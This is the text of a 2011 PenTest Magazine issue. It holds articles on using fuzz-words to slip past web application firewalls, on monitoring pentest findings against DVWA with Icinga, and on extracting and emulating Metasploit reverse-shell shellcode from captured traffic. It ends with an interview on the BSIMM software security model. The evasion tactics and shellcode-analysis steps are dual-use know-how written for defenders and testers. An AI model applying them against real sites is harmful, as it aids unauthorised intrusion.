Figure 8. EvilWebtool: vBSEO XSS Exploit

WAFs are triggered by <[a-Z0-9]>, while they are not


yet triggered by >[a-Z0-9]<. This gives the penetration
tester an advantage in that it requires fewer queries for
success. An experienced penetration may need to ask
him- or herself, if <[a-Z0-9]> is blocked by a WAF, then
how does this give a pentester an advantage over an
automated scanner?
Imagine an aggressive WAF on, lets say, a website
many people visit within the Information Security
community. A penetration tester fires up his favorite
scanner, and one minute later, hes banned for a few
hours. Either he learns from this mistake, and finds out
it was <[a-Z0-9]> that triggered the ban, or he continues
to restart the scanner whenever possible and wastes
precious time.
Now imagine a blackhat has discovered a Local File
Inclusion (LFI) vulnerability on the same target, but the
WAF blocks all malicious looking attacks and bans her
temporarily for a few hours. However, this blackhat has
no timeframe within which to finish the attack, so after
researching the WAF she finds a DoS vulnerability
enabling her to shut the WAF down and thereby abuse
the LFI vulnerability she found earlier.
Most automated scanners are using real attacks,
of course, as they are most efficient this way and are
able to determine whether there is a vulnerability or not
instead of using these so called fuzz-words (see Figure
9). So the chance a WAF picks up the attacks is much
higher than one single fuzz-word designed to avoid
even most but not all aggressive WAFs.

Figure 9. FireFox: After submitting our fuzz-word to a script

Page 31

http://pentestmag.com

WEB APPLICATION SECURITY


Table 1. Humans vs. machines

Humans

Machines

Finding Advanced
0days

Yes

No (Requires AI)

Simultaneous
Requests

No

Yes

Smart Interpreting of
Results

Yes

No (Requires AI)

Massive Variations in
Requests

Time consuming!

Yes

Detect All Common


Vulnerabilities

Time consuming!

Yes

Discover New Attack


Methods

Yes

No (Requires AI)

Enumerate Large SQL


Tables

Time consuming!

Yes

Why not just use or ?

A manual audit of (e.g.) access.logs would tell


most aware webmasters from miles away that
someone tried to perform a SQL injection. A fuzzword is harder to spot if it looks legit. But why is
this important? Some penetration tests also check
the skills of the administrators, internal security
auditors, or perhaps just IDSs to see if they would
be able to pick up a blackhat-looking attack if it
happened.
The target script may not break with just or , it
may even require a / or \ , or maybe the penetration
tester does not know if a particular SQL-query
breaks upon or , so its reasonable to include the
most common characters a function will break upon
receiving. (Including all possible special characters
is not recommended, nor would it be efficient.)

When a download file script is encountered, its


obvious to test for LFI, RFI, Information Disclosure,
and so forth. But an automated scanner may not
know the target script is actually serving files from
the filesystem; it may think it serves them from a SQL
Database and therefore attempt to SQL Inject instead,
which may lead to no results at all.

What is considered best practice nowadays?

Dont rely too much on any automated scanner. Use


them as a complement to your toolbox as well as to your
own methods. While the automated scanner does all
the boring work, such as crawling the website and trying
the most common attack vectors, the penetration tester
could simultaneous apply more advanced heuristic
methods and look for vulnerabilities in the same or
other places.
01/2011 (1) May

After all, at many points humans are still smarter


than machines, and if a penetration tester knows a web
application very well, then he or she also knows which
vulnerabilities to look for and where they might be based
on a behavioral pattern from previous vulnerabilities.
With vBulletin, for example, its obvious to look for
XSS and SQL Injections in new versions with new
features. Looking for LFI and RFI in this particular web
application could be a complete waste of time except in
the add-ons. If new developers have come aboard or an
entire development team has been switched out, then
the entire security of the target web application may
have become insecure, so its good to know how the
company behind the app is working and evolving too.
What are some of the differences between humans
and machines, then?
A report a couple of years ago, revealed that 44 out of
the 50 most visited websites in a country had at least
1 vulnerability and many of them ran custom-built
websites, but it was also well-known web applications
(mostly via add-ons and subdomains) that included
vulnerabilities. Many of these websites had been tested
with automated scanners, but apparently not properly
and/or with manual methods.
The third and final step is intuition applied to
knowledge.

HANSMICHAEL VARBAEK
Hans-Michael
Varbaek
has been in the hacking
community for a little over
10 years now, though with
shorter and longer breaks
from time to time. Around 5
years ago he decided to get
back after a long period of
inactivity, where he began
creating custom cheats for
WoW. (Mountain Climbing, No Clip, etc.) A year later he began the
education as SysAdmin, and during this time he created InterN0T
after brainstorming like crazy. Then he moved to Sweden to
work within IT- support, with some of the big manufacturers of
products like printers, cameras, and so forth. Meanwhile, he
discovered his first 0days in Web Applications, and a year later
he was going for CTP+OSCE, which he completed successfully.,
while shortly Shortly thereafter he began blogging about Web
Application Security at Exploit-DB.

Page 32

http://pentestmag.com

Want to have all the issues of Data Center magazine?


Need to keep up with the latest IT news?
Think youve got what it takes to cooperate with our team?

Check out our website and subscribe to Data


Center magazines newsletter!
Visit: http://datacentermag.com/newsletter/

HOW-TO

Operationalizing

Penetration Testing Results Using Network Monitoring


Software All For Free
We will model the results of a penetration test using network and
application monitoring tools. The end result will be a dashboard
showing you the vulnerabilities that still exist and the ones
that have been remediated. This gives you a quick view of your
vulnerabilities and the speed with which theyre resolved.

enetration Testing these days is often done on


a one-off basis, meaning companies do them
once a month, once a quarter or once a year
and then never think about them again. I find that to
be a shame and think that penetration testing can be
an invaluable tool in vulnerability management when
performed properly.
One of my hobbies/passions/interests/whatever in the
industry is finding a way to effectively operationalize
security. That is, moving security out of the this is
theoretically possibly realm and into the hey, we should
fix this because its happening now realm. Part of
this, I think, is finding a way to utilize the tools used
by our compatriots in the network and applications
management domains. This article will use two very
popular (well... one very popular and one reallyshould-be popular) tools in the network monitoring and
application monitoring spaces respectively. This will
give us a way to display that the vulnerabilities from the
report still exist as reported and measure the response/
remediation time.

Tools Needed:

Icinga (http://www.icinga.org) A fork of the


popular Nagios (www.nagios.org) monitoring suite.
Webinject (http://www.webinject.org) A very
powerful Perl script tool that allows you to build test
cases for web applications.
01/2011 (1) May

DVWA Damn Vulnerable Web Application (http://


www.randomstorm.com/dvwa-security-tool.php)
An intentionally naughty web application.
A Linux operating system. I used Ubuntu 10.10 for
everything, but you may use what you wish.

You will obviously need network connectivity between


the machines and virtual machines are recommended
for this exercise. You will also have to be able to talk
to the web application on the desired ports (typically
ports 80, 443).
Setting up these tools is beyond the scope of this
article, but the installation documentation for all three
tools is excellent, plus there are LiveCDs for two
out of the three of them, so go ahead and get your
environment set-up.
In our theoretical world, lets pretend we just received
a penetration test report that our web application
(DVWA) has a weak password associated with it. For
this example the login is admin/password. We begin
by using Webinject to test that the login does indeed
work. This is done by creating a testcase in Webinject
language: see Listing 1.
The first test, cleverly given the id of 1, verifies
that the login.php page loads correctly, we want to be
sure its there before we try to login to it. The second
test then posts our username (admin) and our weak
password to login.php and then verifies we can see

Page 34

http://pentestmag.com

Listing 1. Creating a testcase in Webinject language


---testcases.xml
<testcases repeat="1">
<case

id="1"

description1="Load Login Page"

description2="verify Page Loads"


method="get"

url="http://192.168.38.156/login.php"

/>
<case

verifypositive="Damn Vulnerable Web Application"

id="2"

description1="Verify Weak Login Works"


method="post"

url="http://192.168.38.156/login.php"

postbody="username=admin&password=password"
/>

verifypostive="Welcome to Damn Vulnerable Web App"

</testcases>

the content behind the login. We can further extend


this to test cases encompassing everything on our
reports. SQL Injections, XSS bugs, etc., can all be
modeled this way and monitored for. The beauty of
using Webinject is it allows us to use it easily as a
nagios/Icinga plugin. Simply add <reporttype>nagios</
reporttype> to config.xml and you will get nagios/Icinga
compatible output.
Now you could very easily be done at this point. You
have some test cases to run that verifies the issues
found in the report. You could put this in a cron job
that emails you the status every couple of days and
be perfectly happy. However, with a little more work
you can integrate this verification with Icinga and
then have a near real-time dashboard showing the
status of your remediation efforts. This integration
will do a few things for you, most importantly, it will
provide some perspective on how much badness
was really found during your penetration test. It will
also add some accountability as you can break up
the dashboard by responsible groups. This way the
server administrators can see what is going on with
the servers and the application team can see just the
applications. Finally, it can provide some reporting for
01/2011 (1) May

you on how fast vulnerabilities are getting resolved.


This can be a powerful tool in your arsenal and it
speaks the languages of your network and application
teams, as well as, articulating the vulnerabilities to
your security team while, providing metrics for your
business team.

BILL MATHEWS
Bill Mathews is co-founder and
lead geek of Hurricane Labs,
an information security firm
founded in 2004. Bill wrote
this article while recovering
from
pneumonia
so
any
errors are purely the result of
medication. :-) You can reach
Bill @billford on Twitter and be
read other musings on http://
blog.hurricanelabs.com

Page 35

http://pentestmag.com

TOOLS

Pulling Shellcode
From Network Stream
In computer security terms, a shellcode is used as a payload
in exploiting software vulnerabilities. It consists of small piece
of codes, the exploitation of which may result in the attacker
starting a command shell, from which the attacker can control
the compromised computer; hence the term shellcode. But the
function is not limited to spawn a shell only, it can go the other
way around.

hellcode can either be local or remote, depending and event driven analysis of IDS alerts. Sguils main
on whether it gives an attacker control over component is an intuitive GUI that provides access to a
the machine it runs on (local) or over another wide variety of security related information, including realmachine through a network (remote) [1]. Shellcode time IDS alerts, network session database and full packet
can usually be seen and grabbed from the
network stream with the help of proper tools
in hand. Metasploit framework provides
ready to run shellcode modules that can be
compiled easily. Earlier days of exploitation
Figure 1. Snort Rule and Signature
with shellcode required lots of coding and
programming efforts. Metasploit has simplified
this in their framework. In this article, we will
use several security tools to pull the shellcode
from network stream and analyze the output.

Tools Used

To perform analysis of network stream,


several open source security tools are
demonstrated in this article, namely the
Sguil framework, Snort Intrusion Detection
System, Wireshark and Libemu. Note that not
all of these tools are necessary required
in shellcode analysis. This is only for
demonstration purposes.

Sguil

framework [2] is the standard tool


used in Network Security Monitoring (NSM) Figure 2. Sguil Framework
Sguil

01/2011 (1) May

Page 36

http://pentestmag.com

Figure 5. Wireshark

Figure 3. Transcript Option

captures. Widely considered as the de facto IDS standard,


Snort has been used as part of the main components in
Sguil framework, as well as sancp, pads and pcap.

Wireshark

is a popular network protocol analyzer and is


used to analyze network traffic for Unix and Windows.
We can gain lots of informationrelating to network
activities using Wireshark as well as detecting the
shellcodes that have been triggered by the Snort IDS.
This step will be explained later.
Wireshark

Libemu

is a small library written in C offering basic x86


emulation and shellcode detection using GetPC heuristics.
Libemu

It is designed to be used within network intrusion/


prevention detections and honeypots.Libemu can also be
added as extension in Wireshark. We use libemu here to
detect shellcodes, execute and emulate the shellcodes.
Output of the emulated process can be seen and we can
study the behavior and what the shellcode does. Libemu
can be obtained from the libemu website [3].

Snort Rules Definition And Signature

Analyst can start tracing incidents by checking and


monitoring network security systems and devices.
In this article, Snort IDS is used as the main alert
indicator. Below is the content of the rule set used on
the detection of shellcode. This has been taken from
the emerging-exploit.rules from the default Emerging
Threats rule set.
Consider the above Snort rule (Figure 1). This
particular rule will be triggered if the source of attack is
from external network with shellcode ports to home or
internal network that matches with rules content. The
rule content is D9 EE D9 74 24 F4 5B 81 73 13 and 83 EB FC
E2 F4 which matches default Metasploit encoder.

Sguil Alert System And Analysis

The analysis starts by analyzing alerts from Snort


IDS. Sguil framework has provided a comprehensive

Figure 4. Transcript Output

01/2011 (1) May

Figure 6. Follow TCP stream option

Page 37

http://pentestmag.com

TOOLS

Figure 7. Suspected Shellcode

Figure 9. Shellcode Conversion

environment where analyst can see alerts that trigger


the rules discussed on Section: Snort Rules Definition
And Signature. Figure 2 shows the Sguil frontend.
The main question for analysts on viewing such alerts
and attacks is that what they are (the attackers) trying
to do and what was the payload used within the attack.
Here we can see the attacker using Metasploit encoder
that has been triggered by the Snort IDS rule identified by
Exploit x86 PexFnstenvMov/Sub Encoder. To help us
understand and grab the shellcodes, below are some of
the steps that we can make.

the alert. In Figure 5, by clicking on the Alert ID column,


the analyst can move to Wireshark option which will
launch Wireshark application to help further investigation
of the payload.The analyst can now proceed with
network analysis by navigating to Follow TCP Stream in
Figure 6 inside Wireshark application.
The output of Follow TCP Stream can be seen in
Figure 7. Here we can see the highlighted area of hex
dump is the suspected components of the shellcode
due to NOP-slide opcode 0x90.

View The Transcript Event:

In x86 exploits, the most commonly used NOP-slide


uses opcode 0x90 (NOP) [4]. Network intrusion
detection system like Snort and other IDS brandscan
detect long sequences of NOP, which is most commonly
used for timing purposes, to force memory alignment, to
prevent hazards, to occupy a branch delay slot, or as a

In Figure 3, the analyst can perform a quick view of a


transcript event by right click on the Alert ID number,
and choosing Transcript. Transcript is very useful for
ASCII-based protocols, and it generates full content
data for the alert, if available. Figure4 shows the output
of Transcript and gives analyst a quick view of the
content data for the alert. In Figure 4 we can see an
overview of the attack, but this normally is not sufficient
in doing in-depth analysis on network-based attack.

Shellcode Analysis

Read The Full Content Of Pcap Using Wireshark:

Within Sguil framework, analysts can launch Wireshark


where they can inspect full content data generated by

Figure 10. Shellcode executed in libemu sctest


Figure 8. Hex Output

01/2011 (1) May

Page 38

http://pentestmag.com

placeholder to be replaced by active instructions later


on in program development. Furthermore, this matches
the Snort signature in contents D9 EE D9 74 24 F4 5B
81 73 13 and 83 EB FC E2 F4. To analyze this, copy the
selected area from Wireshark output and paste it in a file,
we name it here asx86penv_hexdump. A simple bash script
to get the hex only value can be implemented for better
output. For example:

shellcode will try to establish a reverse connection to


IP address x.x.227.12 on port 18005. Prior to establishing
the reverse connection to the said IP address, the
shellcode will call a function called LoadLibraryA to load
a dll library. The shellcode later will initiate a standard
connection startup by calling a sequence of functions,
which are WSAStartup, WSASocket [6] and connect. The
connect function will receive a set of parameters, which
will be used later to connect to the IP address and to
port number 18005.
The payload used in this attack will establish a
reverse connection to the malicious server x.x.227.12 on
port 18005. In this case, we have already captured two
important pieces of information in our analysis which
are the attacker IP and the port number it connects
to. Further analysis of testing the actual binary from
the shellcode can be conducted to see what are the
activities involved while initiating and establishing the
reverse connection to the attacker IP and port number.

$ more x86penv_hexdump | cut -d -f3-19 | sed -e s/ //g

Conclusion

References

[1] http://en.wikipedia.org/wiki/Shellcode
[2] http://sguil.sourceforge.net/
[3] http://libemu.carnivore.it/
[4] http://www.phreedom.org/solar/honeynet/scan20/scan20.html
[5] http://en.wikipedia.org/wiki/NOP
[6] http://msdn.microsoft.com/en-us/library/ms742212%28v=vs.8
5%29.aspx
[7]http://sandsprite.com/shellcode_2_exe.php
[8] http://malzilla.sourceforge.net/

The above shell command will produce the output we


needed as in Figure 8.
The extracted hex can then be copied and pastedto
the online shellcode to exe converter [7] to get the bytes
only format.
In Figure 9, save the output as bytes only. The
bytes.sc file is actually a data file format whichlater on
will be fed to libemusctest command to get the shellcode
analysis.An easier and simpler way is actually to directly
feed the raw file, which is a pcap file format that can be
downloaded from the Sguil framework. The raw file later
on will be fed for analysis with libemu sctest and produce
the same results as the bytes.sc file. However, this does
not work with all raw format files.

Libemu analysis and output

To proceed with shellcode analysis, libemu is used to


emulate and detect the shellcode. To use libemu sctest,
simply issue this command:
$ /opt/libemu/bin/sctest -Sgvs 10000000000000 < bytes.sc

Several sctest option to be understand here are the


S, which will read shellcode or buffer from stdin, -g or -getpc to run getpc mode and try to detect a shellcode,
-s is maximum number of steps to run. For example
in Figure 10, the value is set to 10000000000000 and
v option is for verbose output. Belowis the emulated
output by libemu that is generated from thebytes.sc file.
Figure 10 shows the shellcode executed inside
libemus sctest. Based on the figure, we see that the
01/2011 (1) May

Pulling shellcode from network stream is possible,


given that we use the proper tools and technique while
extracting it. Further analysis usually is required to fully
understand the shellcode behavior to the extent on was
it successful in exploiting the systems. By using widely
available free and open source tools such as Snort IDS,
Wireshark and libemu, shellcode analysis for network
based attack becomes less hectic.
For further analysis and reverse engineering part,
shellcode that has been pulled from the network stream
can be converted to binary or .EXE format file. This is
crucial for analyst to do live malware analysis or reverse
engineering by running the binary inside a secure lab
environment.
Malzilla [8], a malware hunting tool also utilizes libemu
in their program for shellcode analyzer and detection.
Libemusctest function can also be integrated within
Wireshark for immediate shellcode detection. This will be
covered in the next version of the article.

SALAHUDIN WAN KHAIRUZZAMAN


Salahudin Wan Khairuzzaman is a
security technologist and intrusion
analyst at Malaysian CERT (MyCERT).
His area of focus and interest is network
security monitoring and analysis,
distributed honeynet, network/infrastructure planning and virtualization.
He is also one of CyberSAFE
ambassador at CyberSecurity Malaysia and conducted
several presentations for Malaysian public regarding Internet
security.

Page 39

http://pentestmag.com

INTERVIEW

Interview with

Gary McGraw,
Ph.D. CTO Cigital

Gary McGraw from Cigital about his views on software security


and the Building Security In Maturity Model.

You are a recognizable figure in the world of


IT security, but for the sake of introduction,
could you give us a nut-shell story of your
work in this field and how you see it?

Software security is a field that Ive been working on


diligently for the past fifteen years. Its been interesting
to watch it grow and evolve, and turn into a real field over
those fifteen years. Now there are lots of people and firms
that are doing plenty of things to make software better,
which in my view is the only way to make improvements
in computer security. I work for Cigital as the CTO, and
we help large enterprises with setting up and executing
software security initiatives. There are many firms doing
that sort of thing now. At Cigital we help those firms both
plan and execute software security initiatives.

Your main project right now is the Building


Security In Maturity Model.

BSIMM is one of my projects we always have a million


things going on at Cigital! The notion behind the BSIMM
is to be able to measure a large-scale software security
initiative and tell whether progress is being made. We
gather data to help you strategize about how to do a better
job. The cool thing is that the BSIMM was designed to be
able to measure progress regardless of what software
security methodology you are following. That is, you can
use the BSIMM to measure Microsoft SDL, which weve
done, you can use the BSIMM to measure Googles
01/2011 (1) May

appraoch, even though they dont really have a software


security methodology per se. You can use the BSIMM to
measure big banks, like Bank of America and all their seven
divisions. By far the best thing about the measuring aspect
of the BSIMM is that you can start to do some science,
some comparison between software security initiatives.
So, its a very much data-driven scientific exercise in
software security. (See http://bsimm.com for more and to
download a free copy of the model for yourself.)

You have always advocated the necessity


of strengthening software rather than
concentrating on devising outside security
systems, like firewalls, or malware protection.
Is the BSIMM the embodiment of your
convictions in this field?

It is. What I have advocated is building systems that are


secure in the first place, instead of trying to protect broken
ones. The state of the practice back in the mid-1990s was to
put a firewall between the bad people and the broken stuff.
And my simple question was, how come the stuff is broken?
If you take that philosophy to heart, you end up working on
building more secure software and thats exactly what Cigital
does. We invented technology like code-scanning tools (we
built the one behind the Fortify code scanner that recently
got sold to HP, for example). That kind of technology and
that kind of approach is really becoming popular now. Its a
great pleasure for me to watch the blossoming of this field.

Page 40

http://pentestmag.com

How would you describe the idea behind


BSIMM? How does it work and what outcome
does it produce?

We gather data first from firms now we have data from 33


of them. Weve actually made over sixty measurements if
you include major divisions inside the 33 firms. We gather
all of this data and we build a model that you can use to
measure any software security initiative. If you have a firm
that hasnt been measured yet, what you do is you go
in and you sit with the executives who run the software
security group and also (at separate times) with the people
who run different development groups; you interview
them about software security and what theyre doing.
The interview questions are not leading questions at all.
Instead, the exercise is meant to elicit the data needed
to score somebody against the BSIMM. You can actually
make lists of what activity has been observed in the firm.
Sets of observed activities collectively add up to the score.
Then, there are many ways that you can visualize those
data, including low resolution views and high resolution
views, all the way to the level of the 109 activities that we
describe in the BSIMM. When you do that, you get a really
clear view of what your software security initiative looks like
in comparison to all of the others in the data set. It is a very
powerful technique, especially when you use it to discuss
your budgets, or where you stand next to your peers.
Right now we have more data from financial services
organizations than any other. The second-largest dataset
is from high-technology firms and independent software
vendors. So theres tons of data there that you can use
for comparison and then you get a score, and charts that
show where you stand. You can use those data to drive
your initiative, and then, later, re-measure. Actually, we
have just re-measured Microsoft. We interviewed the head
of the software security group thats a group of about a
hundred people some of his lieutenants, and also some
of the program managers for the SDL.

Microsoft is a very big firm. How long


does it actually take to measure such huge
enterprises?

It only took us about seven hours of interviews. Then


we took all the data that we got and it took a couple of
weeks to compute the score. The really cool thing was
that we measured Microsoft two years ago, and then
we measured them just recently. We can actually talk
about the changes in their initiative over time, both in
terms of new activities that theyre taking on, and also in
terms of those they may have dropped, or emphasized
less. Now we have what is called longitudinal data in the
study. There are ten firms that we have measured twice,
so we can talk about the evolution and the change in the
software security initiative over time.
01/2011 (1) May

How do you find the cooperation with


the firms involved in the project? Do they
participate without reservations, or do you
need to convince them that it is for a greater
good? Do they trust you?

Absolutely (though not all of them allow us to go public


with their names). There are currently 23 firms that
do allow us to say their names, and there are 10 who
would prefer that we dont. Many of the firms in the
study are financial services organizations who would
rather not talk about security in the public. There are
also those who took a long time to give us permission.
For example, now we can state that SAP, the second
biggest software company on planet Earth, is part of
BSIMM, but it took two years for the Germans to let us do
that! Some people think that its better not to talk about
security because the people their customers dont
worry about it in the open; they take it for granted. The
interesting thing is that this is a very European trend,
while most American financial services organizations
dont have any issues with going public.

Trust is vital for BSIMM.

Absolutely, cooperation is totally essential to gathering


good data. The BSIMM doesnt work by standing
outside of a firm and trying to measure it. You have to go
inside, and you have to talk very frankly with the people
who run the software security group. They have to invite
you into their living room. And maybe even into their
bathroom. However, all of the firms who chose not to be
publicly discussed, do participate actively and openly in
the BSIMM Community. We have a moderated mailing
list that we all participate in, and we had a couple
of social events including a conference last fall in
Annapolis (Maryland),which lot of firms attended. Some
of them may not publicly state that theyre participating
in the BSIMM, but they were there at the conference. In
fact, one of the really cool aspects of the project is the
community that has developed a community of likeminded senior executives working on software security
initiatives all day at large enterprises.

Why was BSIMM2 introduced? Is it different


from the first version?

The first BSIMM that we released was the study of


nine firms. BSIMM2 was released in April 2010 and it
is a study of thirty firms. We took the original BSIMM
measuring stick and we validated it with twenty-one
more data vectors (representing new firms). The
interesting thing about BSIMM2 is that once you have
thirty vectors, you can begin to do statistical analysis,
which is significant. We ran all sort of statistical analysis
against the data and we publish the most interesting

Page 41

http://pentestmag.com

INTERVIEW
findings and talk about them. There will be BSIMM3
soon, in which even more companies will participate
were shooting for forty. There will also be BSIMM
Longitudinal, which amounts to studies done over time
for some firms (ten so far). We will once again release
all of these data publicly, so that everyone in the field
and everyone in security can use it and think about
metrics and measurements in a much more serious
fashion than has been done in the past.

Talking about the past, you mentioned in the


past creating something what you called a
science of software attack. Do you really think
developers need to be taught to think like a
bad guy?

I used to believe that it was important to teach


developers to think like that. But I have changed my
mind. I still believe that it is very important for the
security people in large organizations to be able to
think like a bad guy and understand software exploit.
But when it comes to developers, I think its much more
important that you teach them how to do things right,
how to do what you might call defensive programming,
how to use frameworks properly, and so on. If you go
to developers and you say, please code like this, steal
this idea, use this design pattern, its way more effective
than saying, let me teach you about cross-site scripting
exploits, which is not what developers need to learn.

You have also said that at the beginning of


your work you and your colleagues felt like
evangelists, out to save the world because
the idea that the software itself might be
the cause of trouble was not popular. Has
anything changed in this matter?

(laughs) I used to call myself an evangelist, but I changed


the word I use to advocate. But yes, I still do feel like its
still pretty early in the field and therere a lot of people
who need to be convinced that software security is the
right way to go. However, we have turned the corner
from philosophy and wishful thinking from the notion
of gosh, weve got to do something, anything to science.
We know what to do, we know how to measure it, now
lets all be serious adults and get this done. Its been
very gratifying to watch us turn the corner from what
I would like to call faith-based software security in the
early days to a science of software security now.
personal http://www.cigital.com/~gem
company http://www.cigital.com
podcast http://www.cigital.com/silverbullet
blog http://www.cigital.com/justiceleague
book http://www.swsec.com

01/2011 (1) May

What, in your opinion, will be the security


trends in 2011?

One of the big trends thats important to track and


understand is the evolution of malware. I think that
things like the Zeus Trojan that goes after banking
credentials and, even worse, stuxnet, which goes after
control systems, show us just exactly how bad malware
can be. In my view, the only way to solve this problem
is to build better software, because malware usually
leverages bugs and flaws in target software in order to
get onto the system in the first place. Another trend is the
growth of software security as a field. Software security
is beginning to move beyond the early adopters and
into the wide middle ground of medium size and smaller
enterprises. A lot of small to medium-sized companies
are now realizing that they need to pay serious attention
to software security. Thats a trend that well definitely
watch unfold over the next couple of years.

What would you advise enterprises at the


moment?

Number one piece of advice is really very simple: you


should have a software security group (SSG) in your
enterprise (see You Really Need a Software Security
Group). The SSG shouldnt be part of the security
operations group, nor should it be part of development,
it should be its own group, and there needs to be a very
senior executive in charge of software security, who
has both authority and responsibility, and the resources
necessary to carry out a software security initiative. If
you look at people like, say, Brad Arkin at Adobe, or Jeff
Cohen at Intel, or Steve Lipner at Microsoft, or Janne
Uusilehto at Nokia, you will find a class of executives who
are working diligently every day on software security with
very large staffs and very large budgets. So, if you run an
enterprise, and you dont have a software security group
yet, you need to fix that immediately. Also note that a
BSIMM measurement and involvement with the BSIMM
Community is a good idea.

Could you tell us what you are working on


at the moment besides BSIMM? Are you
planning to publish anything soon?

Im supposed to be writing the second edition of Building


Security Software. Thats a book that I wrote with John
Viega originally in 2001, so its been a decade since that
book was written and it still gets bought and read by
people. I think it could use an updating.

PENTEST MAGAZINE TEAM


Page 42

http://pentestmag.com

You might also like